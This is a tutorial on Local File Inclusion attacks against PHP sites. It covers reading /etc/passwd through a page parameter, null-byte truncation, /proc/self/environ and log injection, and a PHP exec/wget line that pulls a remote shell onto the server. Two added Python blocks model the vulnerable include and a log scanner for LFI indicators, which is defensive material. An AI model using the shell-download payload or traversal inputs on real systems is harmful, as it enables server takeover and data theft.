[ lfi ]

LFI stands for Local File Inclusion. This is when you find a particular file on the web server's filesystem and use it against the web server, such as reading /etc/passwd for its usernames and password entries.

Here are some dorks:


An example of a vulnerable site URL would look like this: www.site.com/index.php?page=/etc/passwd
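To make the vulnerable pattern behind that URL concrete from the defender's side, here is an added example that is not code from this tutorial. It models a script that glues the page parameter onto a path and appends .php, next to a resolver that rejects the request instead. PAGES_DIR, ALLOWED_PAGES and the function names are constructed for the illustration; the note about PHP before 5.3.4 stopping at a NUL byte is background, not something this page states.

```python
import os
from typing import Optional, Tuple
from urllib.parse import unquote

PAGES_DIR = "/var/www/site/pages"             # assumed location of includable pages
ALLOWED_PAGES = {"home", "about", "contact"}  # constructed allowlist of page names


def build_include_path_unsafe(page_param: str) -> str:
    """The vulnerable pattern: the query value goes straight into a path and
    an extension is appended.  Nothing stops "../../etc/passwd" from walking
    out of PAGES_DIR, and PHP releases before 5.3.4 stopped reading the path
    at a NUL byte, so the appended ".php" was never seen by the runtime."""
    return os.path.join(PAGES_DIR, unquote(page_param) + ".php")


def check_page_param(page_param: str) -> Tuple[bool, str]:
    """Explain why a page parameter is accepted or rejected.  The checks are
    independent so that slipping past one does not open the include."""
    page = unquote(page_param)          # %00 decodes to "\x00", %2e%2e to ".."
    if "\x00" in page:
        return False, "null byte"
    if any(s in page for s in ("/", "\\", "..")):
        return False, "path separator or traversal"
    if page not in ALLOWED_PAGES:
        return False, "not in allowlist"
    return True, "ok"


def build_include_path_safe(page_param: str) -> Optional[str]:
    """Return the file to include, or None if the request must be refused.
    After the name checks, the canonical path is confirmed to live under
    PAGES_DIR so that a symlink or an allowlist mistake still cannot reach
    /etc/passwd or /proc/self/environ."""
    accepted, _reason = check_page_param(page_param)
    if not accepted:
        return None
    base = os.path.realpath(PAGES_DIR)
    candidate = os.path.realpath(os.path.join(base, unquote(page_param) + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for raw in ("home", "../../../../etc/passwd%00", "/proc/self/environ", "shell"):
        print(f"{raw!r:32} unsafe -> {build_include_path_unsafe(raw)!r}")
        print(f"{'':32} safe   -> {build_include_path_safe(raw)!r} "
              f"({check_page_param(raw)[1]})")
```

The allowlist is the control that actually closes the hole; the separator check and the canonical-path confinement are there so that a later edit to the allowlist, or a symlink inside PAGES_DIR, does not quietly reopen it.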

After checking /etc/passwd we now need to check for /proc/self/environ. Below is a picture of /proc/self/environ.

Next we need to change the User-Agent and try to get data from the site by injecting some code. To do this, open Tamper Data, click Start Tamper, and refresh your page.

Code: <?exec('wget http://www.site.com/shell.txt -O shell.php');?>

Load your shell using the same method: http://www.site.com/index.php?page=shell.php

Then you should have a shell like this:

Every now and again, though, the website may output that /etc/passwd cannot be found, simply because the server is interpreting the location as /etc/passwd.php (the script appends its own extension to whatever you supply). To correct this we need to apply what is called a null byte, which looks like %00 when URL-encoded. In SQL it means 0, but everywhere else in coding it is interpreted similar to a black hole such as /dev/null: the string ends there, so the appended extension is never used. The path would appear as /etc/passwd%00 when entered into the address bar.

At this point we know two things: one, that nothing is properly sanitized by PHP before being passed through, and two, that we now have the ability to look for logs to inject into. Normally LFI tutorials stop a few lines above here, but we shall go a bit more in depth.

There are many common default directory and *.log locations, mainly for Apache-based web servers. You would apply each directory string after the = and see where it takes you. If successful, you should see a page that displays some sort of log for the moment it is executed. If it fails, you will be redirected to a "Page cannot be found" page. You will need to find out what you can about the web server, such as the OS and what version it is running. If you come across a vulnerable box that does not display pass-through text but displays a list of shadowed passwords, you can use the headers to figure out the default directory where the logs might be. Once you have found the directory, you can attempt to inject a command within the browser.
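Everything this walkthrough does leaves a trace in the web server's access log: the page parameter carrying /etc/passwd or /proc/self/environ, the %00 null byte, the ../ traversal, a log path used as the include target, and a PHP tag in the User-Agent. The following is an added example, not part of this tutorial, of a small scanner a defender can run over Apache combined-format log lines to surface those indicators. The log lines are constructed, the indicator lists are an assumption (/var/log/ stands in for the "default *.log locations" the text refers to), and the function names are mine.

```python
import re
from urllib.parse import unquote

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicator lists (assumed): files the text names, plus a stand-in for default log directories.
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/proc/self/environ")
LOG_DIRS = ("/var/log/",)

# Constructed sample log: one benign request, then two from the same client
# following the steps in the text (traversal + null byte, then /proc/self/environ
# with a PHP tag in the User-Agent).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:20 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 911 "-" "<?php echo 1; ?>"',
]


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded %252e%252e is still seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target: str, user_agent: str) -> list:
    """Return the LFI indicators present in one request target and User-Agent."""
    findings = []
    t = fully_decode(target)
    if "\x00" in t:
        findings.append("null_byte")
    if "../" in t or "..\\" in t:
        findings.append("path_traversal")
    for path in SENSITIVE_FILES:
        if path in t:
            findings.append("sensitive_file:" + path)
    if any(d in t for d in LOG_DIRS):
        findings.append("log_file_path")
    if "<?" in fully_decode(user_agent):
        findings.append("php_tag_in_user_agent")
    return findings


def scan_log(lines: list) -> list:
    """Parse each line and keep those with at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m["target"], m["ua"])
        if findings:
            hits.append({"ip": m["ip"], "target": m["target"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["target"], ", ".join(hit["findings"]))
```

Decoding before matching matters: the literal %00 never appears in the decoded string, and a client that double-encodes the traversal would otherwise slip past a plain substring match. Grouping hits by client address, as the sample shows for 203.0.113.7, turns single indicators into the sequence the text describes.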